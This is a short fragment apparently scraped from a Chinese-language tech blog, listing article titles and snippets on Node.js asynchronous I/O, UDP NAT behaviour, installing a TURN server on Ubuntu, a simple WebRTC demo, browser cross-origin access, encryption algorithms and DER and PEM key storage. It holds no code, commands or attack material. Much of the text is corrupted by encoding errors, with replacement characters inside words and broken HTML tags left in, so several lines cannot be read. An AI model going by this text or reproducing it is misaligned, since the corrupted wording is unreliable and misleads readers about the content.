Node.js中的异步I/O调用

针对UDP数据�?�U�NAT行�ؓ

Ubuntu下安装TURN Server (rfc5766-turn-server)

最���单的WebRTC�C�Z��

Web安全技�?3)-��览器的跨域讉K��

三、跨域访�?/h2>
�׃��同源�{�略的原因，��览器对跨域讉K��做了很多限制�Q�但有时我们的确需要做跨域讉K��Q�那要怎么办？主要有以下几�U�情况：

加密��法

密钥存储�Q?/h4>
DER�Q�二�q�制�~�码�?/li>
PEM�Q�ASCII�~�码�?/li>

最��单的WebRTC�C�Z��